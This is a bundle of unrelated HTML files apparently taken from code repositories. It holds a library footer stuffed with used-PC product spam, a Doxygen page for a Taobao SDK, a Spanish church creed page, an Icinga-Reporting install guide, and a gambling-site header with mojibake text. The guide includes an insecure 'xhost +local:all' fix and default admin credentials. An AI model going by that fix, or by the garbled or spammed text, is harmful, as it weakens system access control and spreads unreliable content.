class="clearAfter"> <!-- // hidden --> <span class="hidden">ここからサブメニュー(フッタ)です。</span> <!-- hidden // --> <div class="footer_in2"> <!-- // about --> <p id="about"><a href="">中古パソコン Windows7 無線LAN内臓 富士通 FUJITSU FMV-A8270 Core2Duo P8400 メモリ2GB 【新品HDD500GB】 DVDROM 15.4ワイド 3ヵ月保証(P47-7Wi)【中古】中古 ノートパソコン 送料無料</a></p> <!-- about // --> <!-- // footernavi --> <div id="footernavi"> <ul> <li><a href="http://ndl.go.jp/aboutus/index.html">中古パソコン 【 Microsoft Office ( Word Excel )搭載】 東芝 Dynabook Satellite J72 【新品HDD640GB搭載!】 Core2Duo-2.5Ghz メモリ2GB DVDコンボ (P35h-7of) 3ヵ月保証 中古ノートパソコン 送料無料 【中古】リフレッシュPC リサイクルPC</a></li> <li><a href="http://ndl.go.jp/aboutus/deposit/deposit.html">納本制度</a></li> <li><a href="http://ndl.go.jp/library/index.html">中古パソコン 【見た目に訳あり】 富士通 FMV-A8280 Core2Duo-2.53Ghz メモリ2GB HDD80GB DVDROM 15.6ワイド液晶 【2009年発表モデル】 Office (H09aw) MAR 3ヵ月保証 中古ノートパソコン 送料無料 【中古】 </a></li> <li><a href="">出版者の方へ</a></li> <li><a href="">障害のある方へ</a></li> <li><a href="">中古パソコン 【 Microsoft Office ( Word Excel )搭載】 富士通 FMV-D5390 Windows7 Core i3-2.93Ghz メモリ2GB HDD160GB DVDマルチ [本体のみ] 【Radeon HD5450】 (Z86rof) 3ヵ月保証 中古デスクトップパソコン 送料無料 【中古】</a></li> <li><a href="http://ndl.go.jp/publication/index.html">刊行物</a></li> <li><a href="">中古パソコン 【見た目に訳あり】 富士通 FMV-A8280 Core2Duo-2.53Ghz メモリ2GB HDD80GB DVDROM 15.6ワイド液晶 【2009年発表モデル】 Office (H09aw) MAR 3ヵ月保証 中古ノートパソコン 送料無料 【中古】 </a></li> <li class="end"><a href="http://ndl.go.jp//supply/index.html">調達情報</a></li> </ul> </div> <!-- footernavi // --> <div id="footernavi2" class="clearAfter"> <ul> <li><a href="">サイトポリシー</a></li> <li class="end"><a href="">お問い合わせ</a></li> </ul> </div> </div> <div class="copyright" xml:lang="en" lang="en">Copyright &copy; 2012- All Rights Reserved.</div> </div> <!-- footer // --> </div> </body> </html>
doc/VasSubscSearchRequest_8h.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.3.1"/> <title>Taobao Cpp/Qt SDK: TaoApiCpp/request/VasSubscSearchRequest.h File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Taobao Cpp/Qt SDK </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.3.1 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>File&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1128517a525300e3048e72552ab6f4a6.html">request</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#nested-classes">Classes</a> </div> <div class="headertitle"> <div class="title">VasSubscSearchRequest.h File Reference</div> </div> </div><!--header--> <div class="contents"> <div class="textblock"><code>#include &lt;<a class="el" href="TaoRequest_8h_source.html">TaoApiCpp/TaoRequest.h</a>&gt;</code><br/> <code>#include &lt;<a class="el" href="TaoParser_8h_source.html">TaoApiCpp/TaoParser.h</a>&gt;</code><br/> <code>#include &lt;<a class="el" href="VasSubscSearchResponse_8h_source.html">TaoApiCpp/response/VasSubscSearchResponse.h</a>&gt;</code><br/> </div> <p><a href="VasSubscSearchRequest_8h_source.html">Go to the source code of this file.</a></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a> Classes</h2></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classVasSubscSearchRequest.html">VasSubscSearchRequest</a></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.3.1 </small></address> </body> </html>
views/default/Creemos.html
rubenmunozm/ibsinai
{{extend 'layout_b.html'}} <style type="text/css"> .jumbotron_{ padding:30px; margin-bottom:30px; color:inherit; background-color:#CECECE; } .jumbotron_ h1,.jumbotron_ .h1{ color:inherit } .jumbotron_ p{ margin-bottom:15px; font-size:23px; font-weight:200 } .container .jumbotron_{ border-radius:0 } .jumbotron_ .container{ max-width:100% } @media screen and (min-width:768px){ .jumbotron_{ padding-top:48px; padding-bottom:48px } .container .jumbotron_{ padding-left:60px; padding-right:60px } .jumbotron_ h1,.jumbotron_ .h1{ font-size:67.5px } } </style> <!-- ############################### navbar ################################ --> <nav class="collapse navbar-collapse navbar-fixed-top" id="bs-example-navbar-collapse-1"> <ul class="nav navbar-nav navbar-right " style="padding-right:90px;"> <li class="page-scroll"> <a id="up" href="#page-top" style="color:#494950">Ir Arriba</a> </li> <li style="cursor:pointer"> <a onclick="scrollcustom('#trini',40)" style="color:#A4A3A8">Trinidad</a> </li> <li style="cursor:pointer"> <a id="idcontact" onclick="scrollcustom('#jesus',37)" style="color:#A4A3A8">Jesús</a> </li> <li style="cursor:pointer"> <a onclick="scrollcustom('#iglesia',20)" style="color:#A4A3A8">Iglesia</a> </li> <li class="page-scroll" > <a href="#biblia" style="color:#A4A3A8">Biblia</a> </li> </ul> </nav> <!-- ############################### navbar ends ################################ --> <div class="container-fluid" id="main"> <div class="row-fluid"> <hr> <div class="jumbotron_"> <h1>Nuestro Creedo</h1><br> <div class="panel panel-danger" id="trini"> <div class="panel-heading"> <h3 class="panel-title" align="center">DIOS EN TRES PERSONAS</h3> </div> <div style="background-color:#d7d7d7;" class="panel-body"> Creemos en Dios uno y Trino, es decir, en un solo Dios en tres personas divinas y eternas: Padre, Hijo y Espíritu Santo. Sólo a Dios adoramos, sólo a El damos toda la alabanza, la gloria y el honor, sólo a El rendimos culto, y sólo a El nos dirigimos en oración. </div> </div> <div class="row"> <div class="col-md-4"> <div class="panel panel-success"> <div class="panel-heading"> <h3 class="panel-title" align="center">Padre</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos en Dios Padre, Creador de los cielos y la tierra. </div> </div> </div> <div class="col-md-4"> <div class="panel panel-primary"> <div class="panel-heading"> <h3 class="panel-title" align="center">Hijo</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos en Jesucristo, su único Hijo, nuestro Señor, que fue concebido por obra del Espíritu Santo y nació de la virgen María. </div> </div> </div> <div class="col-md-4"> <div class="panel panel-warning"> <div class="panel-heading"> <h3 class="panel-title" align="center">Espíritu Santo</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos en el Espíritu Santo, Dios santificador, que sella al creyente, lo une a la familia de la fe, mora en Èl, le da dones y lo guía. </div> </div> </div> </div> <div class="row" id="jesus"> <div class="col-md-6"> <div class="panel panel-info"> <div class="panel-heading"> <h3 class="panel-title" align="center">Jesús</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos que JESUS es verdadero Dios y verdadero hombre. <br><br> Creemos en los milagros que Jesucristo hizo durante su ministerio terrenal y en su vida sin pecado.<br><br> Creemos que fue crucificado, murió en la cruz por nuestros pecados, fue sepultado, resucitó al tercer día, ascendió a los cielos después de cuarenta días, y se sentó a la diestra del Padre celestial. <br><br> Creemos que Jesús vendrá por segunda vez, en forma visible, a juzgar a los vivos y a los muertos. <br><br> Creemos que la fe es la completa confianza en Jesucristo para el perdón de los pecados y la salvación.<br><br> Creemos en el sacerdocio universal de todos los creyentes: cada creyente tiene acceso directo a Dios Padre por medio de Jesucristo nuestro Señor, y cada creyente es templo del Espíritu Santo. </div> </div> </div> <div class="col-md-6"> <div class="panel panel-info"> <div class="panel-heading"> <h3 class="panel-title" align="center">Jesús</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos que Jesucristo cargó el castigo de todos nuestros pecados en la cruz del Calvario, en nuestro lugar, y que Su sacrificio fue perfecto y completo. <br><br> Creemos que para su salvación eterna, el hombre debe arrepentirse de sus pecados y confiar en Jesucristo como único Señor y Salvador.<br><br> Creemos que Dios justifica al hombre sólo por los méritos de Jesucristo, sólo por su gracia. <br><br> Creemos que somos declarados justos sólo por la fe en Cristo, sin ningún mérito de nuestra parte.<br><br> Creemos que la sangre de Jesucristo nos limpia de todo pecado, y que si confesamos nuestros pecados a Dios, El nos perdona.<br><br> Creemos que los creyentes en Jesucristo tendrán vida eterna en el cielo, y que los no creyentes irán a la condenación eterna en el infierno.<br><br> </div> </div> </div> </div> <div class="row" id="iglesia"> <div class="col-md-8"> <div class="panel panel-danger"> <div class="panel-heading"> <h3 class="panel-title" align="center">La Iglesia</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos en la Iglesia, cuya cabeza es Cristo, formada por todos los que sinceramente creen en Jesucristo como único y suficiente Señor y Salvador. <br><br> Creemos en la responsabilidad de los cristianos en llevar a cabo la gran comisión: ir por todo el mundo y predicar el evangelio a toda criatura, bautizándolos en el nombre del Padre, y del Hijo, y del Espíritu Santo, y enseñándoles todas las cosas que Jesucristo nos mandó. <br><br> Creemos que las buenas obras del cristiano son el resultado de la verdadera fe, y que todos los cristianos deben ser activos en buenas obras. <br><br> Creemos que como cristianos amamos a nuestro Señor con todo el corazón, y con toda el alma, y con toda la mente, y a nuestro prójimo como a nosotros mismos. </div> </div> </div> <div class="col-md-4" align="center" style="padding-top:30px;"> <img src="{{=URL('static/images','chapel.jpg')}}" alt="..." class="img-responsive img-thumbnail"> </div> </div> <div class="row" id="biblia"> <div class="col-md-3 hidden-xs hidden-sm" align="center" style=""> <img src="{{=URL('static/images','bible.jpg')}}" alt="..." class="img-thumbnail img-responsive" height="215px;"> </div> <div class="col-md-5"> <div class="panel panel-success"> <div class="panel-heading"> <h3 class="panel-title" align="center">Biblia</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos en las Sagradas escrituras como palabra de Dios. 2ª. TIMOTEO 3:16<br><br> Creemos en los 66 libros canónicos de la Biblia (39 del Antiguo Testamento y 27 del Nuevo Testamento), como la Palabra de Dios inspirada y preservada por el Espíritu Santo, única fuente de doctrina y autoridad. </div> </div> </div> <div class="col-md-4 "> <div class="panel panel-primary"> <div class="panel-heading"> <h3 class="panel-title" align="center">Es por Gracia</h3> </div> <div class="panel-body" style="background-color:#d7d7d7;"> Creemos que el ser humano fue creado a imagen y semejanza de Dios, con un alma inmortal, y que por causa de su pecado, vino a estar totalmente separado de Dios.<br><br> Creemos que el hombre no puede, por sí mismo, restaurar su comunión con Dios.<br> </div> </div> </div> </div><br> </div> </div></div> <!-- ############################## MODALS ###########-->
html/docs/cn/reporting.html
sunfw/icinga-cn
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>9.5. Installation of the Icinga-Reporting with JasperReports Server</title> <link rel="stylesheet" href="../stylesheets/icinga-docs.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.75.1"> <meta name="keywords" content="Supervision, Icinga, Nagios, Linux"> <link rel="home" href="index.html" title="Icinga Version 1.9 Documentation"> <link rel="up" href="ch09.html" title="Chapter 9. Integration With Other Software"> <link rel="prev" href="int-mklivestatus.html" title="9.4. MKLiveStatus Integration"> <link rel="next" href="ch10.html" title="Chapter 10. Additional software"> <script src="../js/jquery-min.js" type="text/javascript"></script><script src="../js/icinga-docs.js" type="text/javascript"></script> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <CENTER><IMG src="../images/logofullsize.png" border="0" alt="Icinga" title="Icinga"></CENTER> <div class="navheader"> <table width="100%" summary="Navigation header"> <tr><th colspan="3" align="center">9.5. Installation of the Icinga-Reporting with JasperReports Server</th></tr> <tr> <td width="20%" align="left"> <a accesskey="p" href="int-mklivestatus.html">Prev</a> </td> <th width="60%" align="center">Chapter 9. Integration With Other Software</th> <td width="20%" align="right"> <a accesskey="n" href="ch10.html">Next</a> </td> </tr> </table> <hr> </div> <div class="section" title="9.5. Installation of the Icinga-Reporting with JasperReports Server"> <div class="titlepage"><div><div><h2 class="title" style="clear: both"> <a name="reporting"></a>9.5. Installation of the Icinga-Reporting with JasperReports Server</h2></div></div></div> <div class="toc"><dl> <dt><span class="section">9.5.1. <a href="reporting.html#introduction">Introduction</a></span></dt> <dt><span class="section">9.5.2. <a href="reporting.html#officialdocs">Official Docs</a></span></dt> <dt><span class="section">9.5.3. <a href="reporting.html#requirements">Requirements</a></span></dt> <dt><span class="section">9.5.4. <a href="reporting.html#icingareporting">Icinga Reporting</a></span></dt> <dt><span class="section">9.5.5. <a href="reporting.html#configuration">Configuration</a></span></dt> <dt><span class="section">9.5.6. <a href="reporting.html#reports">Reports</a></span></dt> <dt><span class="section">9.5.7. <a href="reporting.html#errors">Errors</a></span></dt> </dl></div> <div class="section" title="9.5.1. Introduction"> <div class="titlepage"><div><div><h3 class="title"> <a name="introduction"></a>9.5.1. Introduction</h3></div></div></div> <p>The Icinga-Reporting is based on the IDOUtils backend and just like the Icinga-Core, it will support all major database platforms.</p> <p>Here we'll give you some instructions on how to install the Icinga-Reporting with JasperReports Server.</p> </div> <div class="section" title="9.5.2. Official Docs"> <div class="titlepage"><div><div><h3 class="title"> <a name="officialdocs"></a>9.5.2. Official Docs</h3></div></div></div> <p>For more information, please refer to <a class="link" href="http://sourceforge.net/projects/jasperserver/files/JasperServer/JasperServer%205.0.0/JasperReports-Server-CP-Install-Guide.pdf" target="_top">http://sourceforge.net/projects/jasperserver/files/JasperServer/JasperServer%205.0.0/JasperReports-Server-CP-Install-Guide.pdf</a> or <a class="link" href="http://jasperforge.org/espdocs/espbrowse.php?id=86&amp;type=folder&amp;group_id=112&amp;parent=86" target="_top">http://jasperforge.org/espdocs/espbrowse.php?id=86&amp;type=folder&amp;group_id=112&amp;parent=86</a></p> </div> <div class="section" title="9.5.3. Requirements"> <div class="titlepage"><div><div><h3 class="title"> <a name="requirements"></a>9.5.3. Requirements</h3></div></div></div> <div class="itemizedlist"><ul class="itemizedlist" type="disc"><li class="listitem"> <p>Icinga and IDOUtils</p> <p>Installed via <a class="link" href="quickstart-idoutils.html" title="2.5. Icinga with IDOUtils Quickstart">sources</a> or <a class="link" href="icinga_packages.html#icinga-packages">packages.</a></p> <div class="note" title="Note" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note"> <tr> <td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../images/note.png"></td> <th align="left">Note</th> </tr> <tr><td align="left" valign="top"> <p>Starting with Icinga 1.8 there is a database function providing all needed sla-informations. This function needs to be imported into your existing IDOUtils database additional to the Icinga-Reporting package.</p> </td></tr> </table></div> <p>MySQL</p> <pre class="screen">#&gt; /usr/bin/mysql icinga &lt; icinga-reports-1.9.0/db/icinga/mysql/availability.sql</pre> <p>Please make sure your database user (here icinga@localhost) has the correct GRANT for EXECUTE. </p> <pre class="screen">#&gt; /usr/bin/mysql -u root -p &lt;password&gt; icinga mysql&gt; GRANT EXECUTE ON icinga.* TO 'icinga'@'localhost' ; quit</pre> </li></ul></div> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>Apache Tomcat</p> <p>Only if you don't want to use the bundled one from JasperServer</p> <pre class="screen"> #&gt; apt-get install tomcat6</pre> </li> <li class="listitem"> <p>PostgreSQL</p> <p>Only if you don't want to use the bundled one from JasperServer. PostgreSQL is required for JasperServer's internal storage.</p> <div class="note" title="Note" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note"> <tr> <td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../images/note.png"></td> <th align="left">Note</th> </tr> <tr><td align="left" valign="top"> <p>JasperServer changed their backend from MySQL to PostgreSQL in 4.2.1! <a class="link" href="http://jasperforge.org/plugins/espnews/browse.php?group_id=112&amp;news_id=292" target="_top">Source</a></p> </td></tr> </table></div> </li> <li class="listitem"> <p>JasperReports Server</p> <div class="note" title="Note" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note"> <tr> <td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../images/note.png"></td> <th align="left">Note</th> </tr> <tr><td align="left" valign="top"> <p>The new JasperReports Server 5.0.0 is only supported starting with Icinga-Reporting 1.9. If you want to use an older version of the Icinga-Reporting- package, please use at least JasperReports Server 4.5.0.</p> </td></tr> </table></div> <p>Depending on your architecture (<code class="code">uname -a</code>), fetch the appropriate installer - below is x64</p> <pre class="screen"> $&gt; wget http://sourceforge.net/projects/jasperserver/files/JasperServer/JasperServer%205.0.0/jasperreports-server-cp-5.0.0-linux-x64-installer.run $&gt; chmod +x jasperreports-server-cp-5.0.0-linux-x64-installer.run $&gt; sudo ./jasperreports-server-cp-5.0.0-linux-x64-installer.run</pre> <div class="itemizedlist"><ul class="itemizedlist" type="circle"> <li class="listitem"> <p>Agree to license</p> </li> <li class="listitem"> <p>select bundled tomcat</p> </li> <li class="listitem"> <p>select bundled postgresql</p> <div class="itemizedlist"><ul class="itemizedlist" type="square"><li class="listitem"> <p>select a different postgresql port, like 5433, not to interfere with existing setups</p> </li></ul></div> </li> <li class="listitem"> <p>install sample reports and ireports</p> </li> </ul></div> <p>The installer will automatically create the needed database, create the schema and install samples.</p> <div class="note" title="Note" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note"> <tr> <td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../images/note.png"></td> <th align="left">Note</th> </tr> <tr><td align="left" valign="top"> <p>The default installation location will be /opt/jasperreports-server-cp-5.0.0/, so make sure to work on the correct JasperReports Server if you are doing an upgarde!</p> </td></tr> </table></div> <p><span class="emphasis"><em>Start</em></span></p> <pre class="screen"> #&gt; cd /opt/jasperreports-server-cp-5.0.0/ #&gt; ./ctlscript.sh start</pre> <p>For individual components</p> <pre class="screen"> #&gt; ./ctlscript.sh postgresql start|stop #&gt; ./ctlscript.sh tomcat start|stop</pre> </li> </ul></div> </div> <div class="section" title="9.5.4. Icinga Reporting"> <div class="titlepage"><div><div><h3 class="title"> <a name="icingareporting"></a>9.5.4. Icinga Reporting</h3></div></div></div> <p>As from Icinga 1.6 on, the package provides configure and make scripts.</p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>Sources</p> <p>Download from sourceforge and extract. If you have an issue which might be solved in the developer version then get the latest developer snapshot from git </p> <pre class="screen"> $&gt; wget http://sourceforge.net/projects/icinga/files/icinga-reporting/1.9.0/icinga-reports-1.9.0.tar.gz; \ tar xzf icinga-reports-1.9.0.tar.gz; \ cd icinga-reports-1.9.0</pre> <p>or </p> <pre class="screen"> $&gt; git clone git://git.icinga.org/icinga-reports.git ; \ cd icinga-reports</pre> <p>If a developer told you to use his/her branch, check that out with</p> <pre class="screen"> $&gt; git branch localbranch origin/devhead/devbranch $&gt; git checkout localbranch $&gt; git log</pre> </li> <li class="listitem"> <p>Configure</p> <p>If you did not install the JasperReports Server into the default prefix before, you need to tell configure the location. </p> <pre class="screen"> $&gt; ./configure --with-jasper-server=/opt/jasperreports-server-cp-5.0.0</pre> </li> <li class="listitem"> <p>Make</p> <p>Invoke 'make' without params to get a full list of available options.</p> <div class="itemizedlist"><ul class="itemizedlist" type="circle"> <li class="listitem"> <p>MySQL Connector</p> <p>JasperReports Server natively ships with the PostgreSQL Connector, but if you require MySQL, the Icinga-Reporting package provides one for install.</p> <pre class="screen"> #&gt; make install-mysql-connector</pre> <p>Restart the Tomcat server</p> <pre class="screen"> #&gt; cd /opt/jasperreports-server-cp-5.0.0 #&gt; ./ctlscript.sh stop tomcat #&gt; ./ctlscript.sh start tomcat</pre> </li> <li class="listitem"> <p>Install</p> <p>JasperReports Server must be running!</p> <pre class="screen"> #&gt; make install</pre> <p>Restart the Tomcat server</p> <pre class="screen"> #&gt; cd /opt/jasperreports-server-cp-5.0.0 #&gt; ./ctlscript.sh stop tomcat #&gt; ./ctlscript.sh start tomcat</pre> </li> </ul></div> </li> </ul></div> </div> <div class="section" title="9.5.5. Configuration"> <div class="titlepage"><div><div><h3 class="title"> <a name="configuration"></a>9.5.5. Configuration</h3></div></div></div> <p>Open the webinterface, default credentials are jasperadmin:jasperadmin</p> <p><code class="uri">http://127.0.0.1:8080/jasperserver</code></p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"><li class="listitem"> <p>IDO</p> <p>Go to <code class="uri">/root/Icinga/datasource</code> (be sure that Refine contains "changed by anyone").</p> <div class="figure"> <a name="idp15987840"></a><p class="title"><b>Figure 9.1. Icinga reporting datasource IDO</b></p> <div class="figure-contents"> <div class="screenshot"> <div class="mediaobject"><img src="../images/icinga-reporting-datasource-ido_1.8.png" alt="Icinga reporting datasource IDO"></div> </div> </div> </div> <br class="figure-break"> <div class="itemizedlist"> <div class="figure"> <a name="idp15992320"></a><p class="title"><b>Figure 9.2. Icinga reporting datasource ido mysql</b></p> <div class="figure-contents"> <div class="screenshot"> <div class="mediaobject"><img src="../images/icinga-reporting-datasource-ido-mysql_1.8.png" alt="Icinga reporting datasource ido mysql"></div> </div> </div> </div> <br class="figure-break"><ul class="itemizedlist" type="circle"> <li class="listitem"> <p>edit the existing datasource and configure your values. MySQL driver: com.mysql.jdbc.Driver MySQL URL: jdbc:mysql://localhost:3306/icinga </p> </li> <li class="listitem"> <p>test the configuration and save the connection.</p> </li> <li class="listitem"> <p>all reports in our package point to this datasource and should be able to run.</p> </li> </ul> </div> </li></ul></div> </div> <div class="section" title="9.5.6. Reports"> <div class="titlepage"><div><div><h3 class="title"> <a name="reports"></a>9.5.6. Reports</h3></div></div></div> <p>Verify that the reports are available and working.</p> <div class="figure"> <a name="idp15999056"></a><p class="title"><b>Figure 9.3. Icinga reporting</b></p> <div class="figure-contents"> <div class="screenshot"> <div class="mediaobject"><img src="../images/icinga-reporting-overview_1.8.png" alt="Icinga reporting"></div> </div> </div> </div> <br class="figure-break"> </div> <div class="section" title="9.5.7. Errors"> <div class="titlepage"><div><div><h3 class="title"> <a name="errors"></a>9.5.7. Errors</h3></div></div></div> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>Display Errors</p> <pre class="screen"> org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.InternalError: Can't connect to X11 window server using ':0' as the value of the DISPLAY variable.</pre> <p>The tomcat being run as root, trying to access the users x11 display. Allow it for everyone locally.</p> <pre class="screen"> $&gt; xhost +local:all</pre> </li> <li class="listitem"> <p>Generation Errors</p> <pre class="screen"> org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoClassDefFoundError: Could not initialize class net.sf.jasperreports.engine.util.JRStyledTextParser</pre> <p>It could be Sun AWT trying to connect to X11 classes, but actually it's the PDF generation on a report.</p> <pre class="screen"> $&gt; sudo apt-get install msttcorefonts $&gt; cd /opt/jasperreports-server-cp-5.0.0 $&gt; sudo sh ctlscript.sh stop $&gt; sudo sh ctlscript.sh start</pre> </li> </ul></div> <a class="indexterm" name="idp16008352"></a> </div> </div> <div class="navfooter"> <hr> <table width="100%" summary="Navigation footer"> <tr> <td width="40%" align="left"> <a accesskey="p" href="int-mklivestatus.html">Prev</a> </td> <td width="20%" align="center"><a accesskey="u" href="ch09.html">Up</a></td> <td width="40%" align="right"> <a accesskey="n" href="ch10.html">Next</a> </td> </tr> <tr> <td width="40%" align="left" valign="top">9.4. MKLiveStatus Integration </td> <td width="20%" align="center"><a accesskey="h" href="index.html">Home</a></td> <td width="40%" align="right" valign="top"> Chapter 10. Additional software</td> </tr> </table> </div> <P class="copyright">© 2009-2013 Icinga Development Team, http://www.icinga.org</P> </body> </html>
wulu/2015.11.23/qipai/qipaiyouxipingtai/2509.html
bylu/Test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ×¢²áËͽð±Ò</title> <meta name="keywords" content="Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ,Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ,Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ" /> <meta name="description" content="×÷ΪÆåÅÆÀàÓÎÏ·µ±ÖÐ×î¾ßÓÐÈËÆøµÄÒ׿áÆåÅÆÓÎÏ·ÓÎÏ·ÔٴεãȼÁËÓÎÏ·ÍøÂçµÄÕ½»ð£¬ÒýÀ´ÁËÎÞÊý¹ÛÖÚºÍÍæ¼ÒÃǵÄΧ¹Û¡£Ëæ×ÅÐÂÒ»ÂÖµÄÖØÐ¿ªÆô£¬ Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ ¸üÊÇÖØ°õÀ´Ï®£¬¾«²ÊÁ¬Á¬" /> <link rel=stylesheet type=text/css href="/qipai/templets/default/style/style.css"> <link rel=stylesheet type=text/css href="/qipai/templets/default/style/p.css"> <link rel=stylesheet type=text/css href="/qipai/templets/default/style/common.css"> <script tyep="text/javascript" src="/qipai/templets/default/js/jquery-1.8.3.min.js"></script> </head> <body> <DIV class=top> <DIV class=c_960> <DIV class=top-nav><SPAN>Hi£¬»¶Ó­À´µ½789ÓÎÏ·ÖÐÐÄ£¡</SPAN></DIV> <DIV><!-- logo --> <DIV style="POSITION: relative" class=logo><A href="http://www.789game.com"></A></DIV> <DIV class=nav> <UL> <LI><a href="http://www.789game.com/" target="_blank">ÍøÕ¾Ê×Ò³</a></LI> <li><a href='/qipai/qipaiyouxipingtai/' target="_blank" >ÆåÅÆÓÎϷƽ̨</a></li> <li><a href='http://www.789game.com/GameIntroduction.aspx' target="_blank" >ÓÎÏ·½éÉÜ</a></li> <li><a href='http://www.789game.com/NewsList.aspx' target="_blank" >ÐÂÎŹ«¸æ</a></li> <li><a href='http://shuihu.789game.com/' target="_blank" >½Ö»úˮ䰴«</a></li> <li><a href='http://www.789game.com/xinshoubangzhu.html' target="_blank" >ÐÂÊÖ°ïÖú</a></li> <li><a href='http://buyu.789game.com/' target="_blank" >½Ö»úǧÅÚ²¶Óã</a></li> </UL> </DIV> <!-- µ¼º½À¸½áÊø --> </DIV> </DIV> </DIV> <div style="BORDER: 